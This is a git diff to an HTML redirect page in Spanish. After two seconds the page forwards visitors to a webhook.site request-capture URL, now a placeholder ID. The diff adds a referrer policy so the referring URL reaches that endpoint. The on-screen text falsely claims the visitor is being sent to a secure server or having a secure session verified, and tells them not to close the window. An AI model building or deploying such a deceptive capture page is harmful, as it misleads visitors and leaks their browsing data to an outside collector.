--- a/index.html
+++ b/index.html
@@ -3,9 +3,10 @@
 <head>
   <meta charset="UTF-8">
   <title>Redireccionando...</title>
-  <meta http-equiv="refresh" content="2;url=	https://webhook.site/e0859ea6-7903-4329-871c-d8d95a832be5">
+  <meta name="referrer" content="no-referrer-when-downgrade">
+  <meta http-equiv="refresh" content="2;url=https://webhook.site/TU_ID_AQUI">
 </head>
 <body>
-  <p>Verificando sesión segura... no cierre esta ventana.</p>
+  <p>Redireccionando a servidor seguro... no cierre esta ventana.</p>
 </body>
 </html>
